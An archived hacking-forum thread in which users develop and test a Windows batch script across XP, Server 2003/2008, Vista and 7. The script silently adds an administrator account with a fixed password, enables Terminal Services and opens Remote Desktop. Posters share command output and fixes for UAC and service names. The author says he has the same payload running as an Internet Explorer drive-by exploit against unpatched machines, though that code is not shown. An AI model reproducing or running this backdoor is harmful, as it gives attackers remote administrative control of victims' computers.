Jump to content

Archived

This topic is now archived and is closed to further replies.

digip

Enable RDP and TermService via bat script

Recommended Posts

I have tested this in Windows XP Pro and it works fine. It will not work in Home editions(obviously, no RDP settings, only remote assistance). What I would like someone to do, is maybe try it on Server 2003, Vista and Windows 7(Above home edition, needs RDP cababilities), as I do not have anything above Home edition for Vista/7 and dont have Server 2003 installed anywhere at the moment.

::: Tested to work on Windows XP Pro, 
::: Will not work on Home edition (There is no TermServices for RDP, only Remote Assistance)
::: Might possibly work in Server 2003, but have not tried it yet.  
::: Adds a user "stupid" with password "password" 
::: Enables TermService and Remote Control (RDP) - DigiP
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

@echo off
net user stupid password /add && net localgroup Administrators stupid /add

SC config "TermService" start= "auto"

NET START "Terminal Services"

REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /F

Due to the forums wrapping text, the last two lines of code should be one line, space between /v and fDeny

Share this post


Link to post
Share on other sites

Sure np man.

Give us a few

EDIT: K. Ran through it with 2003 server and Win7. Though admittedly I didn't actually run the batch file on my actual win7 machine =P

2003 - Fine, worked perfectly.

Win7 - Going to assume it works fine. I walked through each command, looked like it would work fine. As well as the reg entry.

(lol at the user and pass btw)

Share this post


Link to post
Share on other sites

In 7, check your system to see 1, did it add a new user as administrator, 2, is remote desktop enabled now (right click my computer, properties, remote settings). If so, whats your IP address ;) j/k. Be sure to delete the user from your system as well as disable the services again if not needed. Thanks for checking. I had a suspicion Server2003 would be just like XP since they are are pretty much the same under the hood aside from the servers services and admin pack.

On a side note, I have this working as a sploit in Internet Explorer, using a wscript hosting flaw. On my system it prompts me if I want to run it(which of course I wouldn't other than for debugging and testing my own machine), but I'm sure there are some people out there with default installs of XP and IE with unpatched machines and even low IE security settings for Active-X and scripting. If those damn spyware apps can get in, then so will this. Its basically the same as the bat commands, just written for VBScript in the browser (and it does work in XP, and most likely Server 2003 now that you have confirmed it for me).

Share this post


Link to post
Share on other sites

Pretty neat script, I remember the first time I ever had to use the remote registry feature on a Server to edit the fDenyTSConnections, I tell you nothing is more fun than running "Shutdown" commands from a server command prompt :lol:

Share this post


Link to post
Share on other sites
Did you need someone to try it out on Server 2008?

Sure, if you want, cause apparently this flaw for IE effects XP, Server2003, Vista and 7, although I wasnt able to get it to work on my wifes 7 box, I may have it locked down too tight to get in, cause I dont even get the prompt in IE8 to run the code, nor does it create any users on her system.

Share this post


Link to post
Share on other sites
Sure, if you want, cause apparently this flaw for IE effects XP, Server2003, Vista and 7, although I wasnt able to get it to work on my wifes 7 box, I may have it locked down too tight to get in, cause I dont even get the prompt in IE8 to run the code, nor does it create any users on her system.

I'll give it a shot when I get home tonight and post the results.

I wonder if it would work on my 7 box since I haven't exactly locked anything down. :lol:

Share this post


Link to post
Share on other sites
I wonder if it would work on my 7 box since I haven't exactly locked anything down. :lol:
If its home edition, wont work for RDP, but should for adding a user and term service.

Share this post


Link to post
Share on other sites

Heh. I'm running Win 7 Ultimate (like an idiot, cuz I hardly use RDP, but I like having my local users and group applet... )

I'll probably install a copy of 7 and Vista in a VM and see what happens.

To do list:

Install Server 2008, 7, Vista and run script.

Man I love VirtualBox. B)

Share this post


Link to post
Share on other sites

So a batch file is pretty much just CMD commands listed in a certain way to preform what you want right?

I found this site pretty cool for learning advanced windows cmd commands

http://blog.commandlinekungfu.com/

to be honest I have not made a batch file since before windows existed and it was only DOS, or when the first windows came out up to my 386DX

Share this post


Link to post
Share on other sites

Ok here's the one for Windows Server 2008:

C:\Users\Administrator\Documents>test.cmd
The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements.

More help is available by typing NET HELPMSG 2245.

[SC] ChangeServiceConfig SUCCESS
The service name is invalid.

More help is available by typing NET HELPMSG 2185.

The operation completed successfully.

C:\Users\Administrator\Documents>

After disabling complexity requirements in GPO it worked, minus terminal services I think.

C:\Users\Administrator\Documents>test.cmd
The command completed successfully.

The command completed successfully.

[SC] ChangeServiceConfig SUCCESS
The service name is invalid.

More help is available by typing NET HELPMSG 2185.

The operation completed successfully.

C:\Users\Administrator\Documents>

It did enable remote desktop, and you can login with "stupid//password"

Next post will by for Vista.

Share this post


Link to post
Share on other sites

With UAC enabled:

C:\Users\User\Documents>test
System error 5 has occurred.

Access is denied.

[SC] OpenService FAILED 5:

Access is denied.

System error 5 has occurred.

Access is denied.

ERROR: Access is denied.

C:\Users\User\Documents>

With UAC disabled:

C:\Users\User\Documents>test.cmd
The command completed successfully.

The command completed successfully.

[SC] ChangeServiceConfig SUCCESS
The requested service has already been started.

More help is available by typing NET HELPMSG 2182.

The operation completed successfully.

C:\Users\User\Documents>

Share this post


Link to post
Share on other sites
The command completed successfully.

The command completed successfully.

[sC] ChangeServiceConfig SUCCESS

The service name is invalid.

It did enable remote desktop, and you can login with "stupid//password"

In server 2008, can you open services.msc and scroll down for Terminal Services. or somethign similar, I need to know the actual name of the service description. It seems that it still uses sc TermService but the actual net command uses a different name to start the service, although it looks like your system already had it running since RDP was able to start.

Share this post


Link to post
Share on other sites

Windows 7:

With UAC enabled:

C:\Users\user\Documents>test.cmd
System error 5 has occurred.

Access is denied.

[SC] OpenService FAILED 5:

Access is denied.

The service name is invalid.

More help is available by typing NET HELPMSG 2185.

ERROR: Access is denied.

C:\Users\user\Documents>

Without UAC enabled:

C:\Users\user\Documents>test.cmd
The command completed successfully.

The command completed successfully.

[SC] ChangeServiceConfig SUCCESS
The service name is invalid.

More help is available by typing NET HELPMSG 2185.

The operation completed successfully.

C:\Users\user\Documents>

Share this post


Link to post
Share on other sites
In 7, check your system to see 1, did it add a new user as administrator, 2, is remote desktop enabled now (right click my computer, properties, remote settings). If so, whats your IP address ;) j/k. Be sure to delete the user from your system as well as disable the services again if not needed. Thanks for checking. I had a suspicion Server2003 would be just like XP since they are are pretty much the same under the hood aside from the servers services and admin pack.

My ip is lol.lol.lol.XD and RDP port is open and forwarded. :P 2003 machine was a vbox testing server so i really didnt care. Like i said i didnt actually run the script on my host, i only check if your syntax was correct. Didnt actually add anything.

Share this post


Link to post
Share on other sites

I wonder if vista and up dont let you disable Terminal Services, that it is always on other than sc TermService set to auto, disabled, etc. If thats the case, then for Vista, 7, and 2008, all I'll need to do is create the user and enable RDP. At least nothing gets broken in the process either, so I can just leave this as is for generic means.

Share this post


Link to post
Share on other sites

Ok.

For windows 7: There is no Terminal Serves service. There is one that is called "remote desktop services." it's named "TermService"

Got it to start by using this command:

C:\Users\user\Documents>SC config TermService start= auto
[SC] ChangeServiceConfig SUCCESS

Windows Vista: There is a service named "Terminal Services" it is named "TermService"

Same command got it running:

SC config TermService start= auto

Also for Vista and W7, UAC either needs to be disabled or you need to be in an admin command shell..err window... w/e.

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...